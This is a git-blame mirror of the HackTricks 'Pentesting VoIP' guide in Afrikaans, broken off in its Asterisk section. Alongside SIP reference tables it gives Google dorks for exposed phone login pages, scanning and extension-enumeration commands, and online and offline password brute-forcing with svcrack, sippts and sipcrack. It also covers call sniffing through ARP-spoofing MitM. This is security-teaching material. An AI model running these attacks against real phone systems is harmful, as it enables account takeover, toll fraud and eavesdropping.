Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-25 14:10:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-voip/README.md

666 lines
37 KiB
Markdown
Raw Permalink Normal View History

GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
# Pentesting VoIP
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
<details>
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['README.md', 'binary-exploitation/format-strings/README.md',
2024-11-09 13:28:06 +00:00
<summary>Ondersteun HackTricks</summary>
fix
2024-02-03 12:22:53 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
</details>
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
{% endhint %}
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['README.md', 'binary-exploitation/format-strings/README.md',
2024-11-09 13:28:06 +00:00
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
**Kry 'n hacker se perspektief op jou webtoepassings, netwerk, en wolk**
Translated ['README.md', 'binary-exploitation/format-strings/README.md',
2024-11-09 13:28:06 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
**Vind en rapporteer kritieke, exploiteerbare kwesbaarhede met werklike besigheidsimpak.** Gebruik ons 20+ pasgemaakte gereedskap om die aanvaloppervlak te karteer, vind sekuriteitskwessies wat jou toelaat om bevoegdhede te verhoog, en gebruik geoutomatiseerde eksploit om noodsaaklike bewyse te versamel, wat jou harde werk in oortuigende verslae omskakel.
Translated ['README.md', 'binary-exploitation/format-strings/README.md',
2024-11-09 13:28:06 +00:00
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
## VoIP Basiese Inligting
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Om te begin leer oor hoe VoIP werk, kyk:
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
{% content-ref url="basic-voip-protocols/" %}
[basic-voip-protocols](basic-voip-protocols/)
{% endcontent-ref %}
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
## Basiese Boodskappe
```
Request name Description RFC references
------------------------------------------------------------------------------------------------------
REGISTER Register a SIP user. RFC 3261
INVITE Initiate a dialog for establishing a call. RFC 3261
ACK Confirm that an entity has received. RFC 3261
BYE Signal termination of a dialog and end a call. RFC 3261
CANCEL Cancel any pending request. RFC 3261
UPDATE Modify the state of a session without changing the state of the dialog. RFC 3311
REFER Ask recipient to issue a request for the purpose of call transfer. RFC 3515
PRACK Provisional acknowledgement. RFC 3262
SUBSCRIBE Initiates a subscription for notification of events from a notifier. RFC 6665
NOTIFY Inform a subscriber of notifications of a new event. RFC 6665
PUBLISH Publish an event to a notification server. RFC 3903
MESSAGE Deliver a text message. Used in instant messaging applications. RFC 3428
INFO Send mid-session information that does not modify the session state. RFC 6086
OPTIONS Query the capabilities of an endpoint RFC 3261
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
## Response Codes
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
**1xx—Voorlopige Antwoorde**
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
```
100 Trying
180 Ringing
181 Call is Being Forwarded
182 Queued
183 Session Progress
199 Early Dialog Terminated
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
**2xx—Suksesvolle Antwoorde**
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
```
200 OK
202 Accepted
204 No Notification
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
**3xx—Herleidings Antwoorde**
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
```
300 Multiple Choices
301 Moved Permanently
302 Moved Temporarily
305 Use Proxy
380 Alternative Service
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
**4xx—Kliënt Fout Antwoorde**
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
```
400 Bad Request
401 Unauthorized
402 Payment Required
403 Forbidden
404 Not Found
405 Method Not Allowed
406 Not Acceptable
407 Proxy Authentication Required
408 Request Timeout
409 Conflict
410 Gone
411 Length Required
412 Conditional Request Failed
413 Request Entity Too Large
414 Request-URI Too Long
415 Unsupported Media Type
416 Unsupported URI Scheme
417 Unknown Resource-Priority
420 Bad Extension
421 Extension Required
422 Session Interval Too Small
423 Interval Too Brief
424 Bad Location Information
425 Bad Alert Message
428 Use Identity Header
429 Provide Referrer Identity
430 Flow Failed
433 Anonymity Disallowed
436 Bad Identity-Info
437 Unsupported Certificate
438 Invalid Identity Header
439 First Hop Lacks Outbound Support
440 Max-Breadth Exceeded
469 Bad Info Package
470 Consent Needed
480 Temporarily Unavailable
481 Call/Transaction Does Not Exist
482 Loop Detected
483 Too Many Hops
484 Address Incomplete
485 Ambiguous
486 Busy Here
487 Request Terminated
488 Not Acceptable Here
489 Bad Event
491 Request Pending
493 Undecipherable
494 Security Agreement Required
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
**5xx—Bediener Fout Antwoorde**
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
```
500 Internal Server Error
501 Not Implemented
502 Bad Gateway
503 Service Unavailable
504 Server Time-out
505 Version Not Supported
513 Message Too Large
555 Push Notification Service Not Supported
580 Precondition Failure
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
**6xx—Globale Faal Antwoorde**
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
```
600 Busy Everywhere
603 Decline
604 Does Not Exist Anywhere
606 Not Acceptable
607 Unwanted
608 Rejected
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
## VoIP Enumerasie
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
### Telefoonnommers
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Een van die eerste stappe wat 'n Rooi Span kan doen, is om beskikbare telefoonnommers te soek om met die maatskappy te kontak deur OSINT-gereedskap, Google-soektogte of deur webbladsye te scrape.
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Sodra jy die telefoonnommers het, kan jy aanlyn dienste gebruik om die operateur te identifiseer:
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
* [https://www.numberingplans.com/?page=analysis\&sub=phonenr](https://www.numberingplans.com/?page=analysis\&sub=phonenr)
* [https://mobilenumbertracker.com/](https://mobilenumbertracker.com/)
* [https://www.whitepages.com/](https://www.whitepages.com/)
* [https://www.twilio.com/lookup](https://www.twilio.com/lookup)
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Om te weet of die operateur VoIP-dienste bied, kan jy identifiseer of die maatskappy VoIP gebruik... Boonop is dit moontlik dat die maatskappy nie VoIP-dienste gehuur het nie, maar PSTN-kaarte gebruik om sy eie VoIP PBX aan die tradisionele telekommunikasienetwerk te koppel.
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['README.md', 'binary-exploitation/format-strings/README.md',
2024-11-09 13:28:06 +00:00
Dinge soos outomatiese musiekantwoorde dui gewoonlik aan dat VoIP gebruik word.
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
### Google Dorks
```bash
# Grandstream phones
intitle:"Grandstream Device Configuration" Password
intitle:"Grandstream Device Configuration" (intext:password & intext:"Grandstream Device Configuration" & intext:"Grandstream Networks" | inurl:cgi-bin) -.com|org
# Cisco Callmanager
inurl:"ccmuser/logon.asp"
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button"
# Cisco phones
inurl:"NetworkConfiguration" cisco
# Linksys phones
intitle:"Sipura SPA Configuration"
# Snom phones
intitle:"snom" intext:"Welcome to Your Phone!" inurl:line_login.htm
# Polycom SoundPoint IP & phones
intitle:"SoundPoint IP Configuration Utility - Registration"
"Welcome to Polycom Web Configuration Utility" "Login as" "Password"
intext: "Welcome to Polycom Web Configuration Utility" intitle:"Polycom - Configuration Utility" inurl:"coreConf.htm"
intitle:"Polycom Login" inurl:"/login.html"
intitle:"Polycom Login" -.com
# Elastix
intitle:"Elastix - Login page" intext:"Elastix is licensed under GPL"
# FreePBX
inurl:"maint/index.php?FreePBX" intitle: "FreePBX" intext:"FreePBX Admministration"
```
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
### OSINT inligting
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Enige ander OSINT-opsomming wat help om VoIP-sagteware te identifiseer wat gebruik word, sal nuttig wees vir 'n Red Team.
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
### Netwerk Opsomming
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **`nmap`** is in staat om UDP-dienste te skandeer, maar as gevolg van die aantal UDP-dienste wat geskandeer word, is dit baie stadig en mag nie baie akkuraat wees met hierdie soort dienste nie.
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
```bash
sudo nmap --script=sip-methods -sU -p 5060 10.10.0.0/24
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **`svmap`** van SIPVicious (`sudo apt install sipvicious`): Sal SIP-dienste in die aangeduide netwerk lokaliseer.
* `svmap` is **maklik om te blokkeer** omdat dit die User-Agent `friendly-scanner` gebruik, maar jy kan die kode van `/usr/share/sipvicious/sipvicious` aanpas en dit verander.
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
```bash
# Use --fp to fingerprint the services
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
svmap 10.10.0.0/24 -p 5060-5070 [--fp]
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **`SIPPTS scan`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS scan is 'n baie vinnige skandeerder vir SIP-dienste oor UDP, TCP of TLS. Dit gebruik multithreading en kan groot reekse van netwerke skandeer. Dit laat jou toe om maklik 'n poortreeks aan te dui, beide TCP en UDP te skandeer, 'n ander metode te gebruik (standaard sal dit OPTIONS gebruik) en 'n ander User-Agent te spesifiseer (en meer).
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
```bash
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
sippts scan -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
[!] IP/Network: 10.10.0.0/24
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
[!] Port range: 5060-5080
[!] Protocol: UDP, TCP, TLS
[!] Method to scan: REGISTER
[!] Customized User-Agent: Cisco
[!] Used threads: 200
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **metasploit**:
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
```
auxiliary/scanner/sip/options_tcp normal No SIP Endpoint Scanner (TCP)
auxiliary/scanner/sip/options normal No SIP Endpoint Scanner (UDP)
```
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
#### Ekstra Netwerk Opsporing
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
Die PBX kan ook ander netwerkdienste blootstel soos:
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **69/UDP (TFTP)**: Firmware-opdaterings
* **80 (HTTP) / 443 (HTTPS)**: Om die toestel vanaf die web te bestuur
* **389 (LDAP)**: Alternatief om die gebruikersinligting te stoor
* **3306 (MySQL)**: MySQL-databasis
* **5038 (Manager)**: Laat toe om Asterisk vanaf ander platforms te gebruik
* **5222 (XMPP)**: Berigte met behulp van Jabber
* **5432 (PostgreSQL)**: PostgreSQL-databasis
* En ander...
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
### Metodes Opsporing
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Dit is moontlik om **watter metodes beskikbaar is** om in die PBX te gebruik deur `SIPPTS enumerate` van [**sippts**](https://github.com/Pepelux/sippts) te gebruik.
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
```bash
sippts enumerate -i 10.10.0.10
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
### Analiseer bediener antwoorde
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Dit is baie belangrik om die koptekste wat 'n bediener aan ons terugstuur, te analiseer, afhangende van die tipe boodskap en koptekste wat ons stuur. Met `SIPPTS send` van [**sippts**](https://github.com/Pepelux/sippts) kan ons persoonlike boodskappe stuur, alle koptekste manipuleer, en die antwoord analiseer.
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
```bash
sippts send -i 10.10.0.10 -m INVITE -ua Grandstream -fu 200 -fn Bob -fd 11.0.0.1 -tu 201 -fn Alice -td 11.0.0.2 -header "Allow-Events: presence" -sdp
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Dit is ook moontlik om data te verkry as die bediener websockets gebruik. Met `SIPPTS wssend` van [**sippts**](https://github.com/Pepelux/sippts) kan ons persoonlike WS-boodskappe stuur.
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
```bash
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
sippts wssend -i 10.10.0.10 -r 443 -path /ws
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
### Extension Enumeration
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Extensions in a PBX (Private Branch Exchange) system verwys na die **unieke interne identifiseerders wat aan individuele** telefoonlyne, toestelle, of gebruikers binne 'n organisasie of besigheid toegeken word. Extensions maak dit moontlik om **oproepen binne die organisasie doeltreffend te roete**, sonder die behoefte aan individuele eksterne telefoonnommers vir elke gebruiker of toestel.
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **`svwar`** van SIPVicious (`sudo apt install sipvicious`): `svwar` is 'n gratis SIP PBX extensie lyn skandeerder. In konsep werk dit soortgelyk aan tradisionele wardialers deur **'n reeks extensies of 'n gegewe lys van extensies te raai**.
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
```bash
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
svwar 10.10.0.10 -p5060 -e100-300 -m REGISTER
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
```
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
* **`SIPPTS exten`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS exten identifiseer uitbreidings op 'n SIP-bediener. Sipexten kan groot netwerk- en poortreekse nagaan.
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
```bash
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
sippts exten -i 10.10.0.10 -r 5060 -e 100-200
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **metasploit**: Jy kan ook uitbreidings/gebruikersname met metasploit opnoem.
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
```
auxiliary/scanner/sip/enumerator_tcp normal No SIP Username Enumerator (TCP)
auxiliary/scanner/sip/enumerator normal No SIP Username Enumerator (UDP)
```
Translated ['README.md', 'binary-exploitation/format-strings/README.md',
2024-11-09 13:28:06 +00:00
* **`enumiax` (`apt install enumiax`): enumIAX** is 'n Inter Asterisk Exchange protokol **gebruikersnaam brute-force enumerator**. enumIAX kan in twee verskillende modi werk; Volgorde Gebruikersnaam Raai of Woordeboekaanval.
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
```bash
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 10.10.0.10 # Use dictionary
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
enumiax -v -m3 -M3 10.10.0.10
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
## VoIP-aanvalle
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
### Wagwoord Brute-Force - aanlyn
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Nadat die **PBX** en sommige **uitbreidings/gebruikersname** ontdek is, kan 'n Rooi Span probeer om te **authentiseer via die `REGISTER` metode** na 'n uitbreiding deur 'n woordelys van algemene wagwoorde te gebruik om die authentisering te brute-force.
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
{% hint style="danger" %}
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Let daarop dat 'n **gebruikersnaam** dieselfde kan wees as die uitbreiding, maar hierdie praktyk kan verskil, afhangende van die PBX-stelsel, sy konfigurasie, en die organisasie se voorkeure...
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
As die gebruikersnaam nie dieselfde is as die uitbreiding nie, sal jy moet **uitvind wat die gebruikersnaam is om dit te brute-force**.
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
{% endhint %}
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **`svcrack`** van SIPVicious (`sudo apt install sipvicious`): SVCrack laat jou toe om die wagwoord vir 'n spesifieke gebruikersnaam/uitbreiding op 'n PBX te kraak.
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
```bash
svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080 #Crack known username
svcrack -u100 -r1-9999 -z4 10.0.0.1 #Check username in extensions
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **`SIPPTS rcrack`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rcrack is 'n afstand wagwoord kraker vir SIP dienste. Rcrack kan wagwoorde toets vir verskeie gebruikers in verskillende IP's en poortreekse.
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
```bash
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
sippts rcrack -i 10.10.0.10 -e 100,101,103-105 -w wordlist/rockyou.txt
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
```
* **Metasploit**:
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
* [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb)
* [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack\_tcp.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack\_tcp.rb)
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
### VoIP Sniffing
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
As jy VoIP-toerusting binne 'n **Open Wifi netwerk** vind, kan jy **alle inligting snuffel**. Boonop, as jy binne 'n meer geslote netwerk is (verbonden via Ethernet of beskermde Wifi) kan jy **MitM-aanvalle soos** [**ARPspoofing**](../../generic-methodologies-and-resources/pentesting-network/#arp-spoofing) tussen die **PBX en die gateway** uitvoer om die inligting te snuffel.
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
Tussen die netwerk inligting kan jy **web geloofsbriewe** vind om die toerusting te bestuur, gebruiker **uitbreidings**, **gebruikersnaam**, **IP** adresse, selfs **gehashede wagwoorde** en **RTP-pakkette** wat jy kan herproduseer om **die gesprek te hoor**, en meer.
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
Om hierdie inligting te verkry kan jy gereedskap soos Wireshark, tcpdump... gebruik, maar 'n **spesiaal geskepte gereedskap om VoIP-gesprekke te snuffel is** [**ucsniff**](https://github.com/Seabreg/ucsniff).
GITBOOK-3878: change request with no subject merged in GitBook
2023-04-18 14:22:56 +00:00
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
{% hint style="danger" %}
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
Let daarop dat as **TLS in die SIP kommunikasie gebruik word** jy nie die SIP kommunikasie in duidelik sal kan sien.\
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Dieselfde sal gebeur as **SRTP** en **ZRTP** gebruik word, **RTP-pakkette sal nie in duidelike teks wees**.
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
{% endhint %}
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
#### SIP geloofsbriewe (Wagwoord Brute-Force - aflyn)
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
[Kontroleer hierdie voorbeeld om beter te verstaan hoe 'n **SIP REGISTER kommunikasie** werk](basic-voip-protocols/sip-session-initiation-protocol.md#sip-register-example) om te leer hoe **geloofsbriewe gestuur word**.
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **`sipdump`** & **`sipcrack`,** deel van **sipcrack** (`apt-get install sipcrack`): Hierdie gereedskap kan **uittrek** uit 'n **pcap** die **digest-authentikasies** binne die SIP-protokol en **bruteforce** hulle.
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
```bash
sipdump -p net-capture.pcap sip-creds.txt
sipcrack sip-creds.txt -w dict.txt
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **`SIPPTS dump`** van [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS dump kan digest-authentikasies uit 'n pcap-lêer onttrek.
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
```bash
sippts dump -f capture.pcap -o data.txt
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **`SIPPTS dcrack`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS dcrack is 'n hulpmiddel om die digest-outentifikasies wat met SIPPTS dump verkry is, te kraak.
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
```bash
sippts dcrack -f data.txt -w wordlist/rockyou.txt
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **`SIPPTS tshark`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS tshark onttrek data van die SIP-protokol uit 'n PCAP-lêer.
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
```bash
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
sippts tshark -f capture.pcap [-filter auth]
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
#### DTMF kodes
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
**Nie net SIP geloofsbriewe** kan in die netwerkverkeer gevind word nie, dit is ook moontlik om DTMF kodes te vind wat gebruik word om byvoorbeeld toegang tot die **stempos** te verkry.\
Dit is moontlik om hierdie kodes in **INFO SIP boodskappe**, in **klank** of binne **RTP pakkette** te stuur. As die kodes binne RTP pakkette is, kan jy daardie deel van die gesprek sny en die hulpmiddel multimo gebruik om hulle te onttrek:
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
```bash
multimon -a DTMF -t wac pin.wav
```
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
### Gratis oproepe / Asterisks verbindings miskonfigurasies
GITBOOK-3875: change request with no subject merged in GitBook
2023-04-17 15:16:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
In Asterisk is dit moontlik om 'n verbinding **van 'n spesifieke IP-adres** of van **enige IP-adres** toe te laat:
GITBOOK-3876: change request with no subject merged in GitBook
2023-04-17 15:36:54 +00:00
```
host=10.10.10.10
host=dynamic
